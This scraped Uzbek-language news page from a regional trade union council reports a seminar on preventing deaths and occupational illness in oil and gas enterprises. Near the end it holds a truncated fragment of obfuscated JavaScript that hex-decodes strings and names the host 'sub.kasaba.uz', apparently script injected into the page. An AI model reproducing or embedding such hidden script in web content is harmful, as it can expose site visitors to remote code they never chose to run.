Welcome to O‘ZBEKISTON KASABA UYUSHMALARI FEDERATSIYASINING QASHQADARYO VILOYAT KENGASHI   Click to listen highlighted text! Welcome to O‘ZBEKISTON KASABA UYUSHMALARI FEDERATSIYASINING QASHQADARYO VILOYAT KENGASHI

Amaliy seminar bo‘lib o‘tdi

    “O‘zbekneftgaz” Milliy xolding kompaniyasi tomonidan “O‘zgeoburg‘uneftgaz” Aksiyadorlik kompaniyasida xolding kompaniya tasarrufidagi neft-gaz sohasidagi korxona va tashkilotlarda tabiiy o‘limning oldini olishga bag‘ishlangan amaliy seminar yig‘ilishi bo‘lib o‘tdi. Yig‘ilishda “O‘zbekneftgaz” MXK boshqaruvi raisi o‘rinbosari Q.To‘xtayev, O‘zbekiston neft-gaz va geologiya xodimlari kasaba uyushmasi Respublika Kengashi raisi M.Ziyayev, “O‘zbekneftgaz” MXK sanoat xavfsizligi tizimini boshqarish va mehnatni muhofaza qilish bo‘limi boshlig‘i M.Hakimov, “O‘zneftgazqazibchiqarish” AK kadrlar va ijtimoiy rivojlantirish bo‘limi boshlig‘i D.Yuldashov, “O‘zbekneftgaz” MXK klinikasi bosh shifokori R.Xudoyberganov, “SHo‘rtan gaz kimyo majmuasi” MCHJ sex poliklinikasi bosh shifokori Z.Beknazarov, “Muborak gazni qayta ishlash zavodi” MCHJ “Muborak tibbiy tozalik qismi” USHK bosh shifokori J.Rahimov, “Muborakneftgaz” MCHJ direktori Sh.Shamsiyevlar so‘zga chiqib ish joylaridagi ruhiy zuriqishni bartaraf etish, ishlab chiqarish obyektlarida davolash profilaktika ishlarini samarali tashkil etish hamda xodimlar mehnatini muhofaza qilishda asosiy e’tiborni profilaktika ishlariga qaratish bo‘yicha bo‘yicha ma’ruza qildilar.
Yig‘ilish ishtirok etgan korxona, tashkilot rahbarlariga ishlab chiqarish obyektlarida xodimlarni kasbiy kasalliklarga chalinishining oldini olish, inson salomatligiga xavf tug‘diruvchi omillarni o‘z vaqtida aniqlab, bartaraf etish choralarini ko‘rish maqsadida tibbiy ko‘riklar samarasi va sifatini yanada oshirish, ishchi-xodimlarni O‘zbekiston Respublikasi sog‘liqni saqlash vazirining 2012 yil 10 iyuldagi “Xodimlarni tibbiy ko‘rikdan o‘tkazish tartibi to‘g‘risidagi nizomni tasdiqlash haqida” bo‘yrug‘ida belgilangan tartibda tibbiy ko‘rikdan o‘tkazish, kasallik alomatlari aniqlangan xodimlarni davolash profilaktika muassasalarida sog‘lomlashtirish va bu boradagi ishlarni boshlang‘ich kasaba uyushma tashkilotlari bilan hamkorlikda amalga oshirish bo‘yicha tegishli ko‘rsatma va tushunchalar berildi. Yig‘ilish savol-javob va munozaralarga boy bo‘ldi. Unda ishtirok etgan korxona, tashkilot rahbarlari hamda kasaba uyushma qo‘mitalari o‘zlarini qiziqtirgan savollarga batafsil javob oldilar.

Слайд4 Слайд2 Слайд1

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "sub.kasaba.uz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Print Friendly, PDF & Email
Click to listen highlighted text!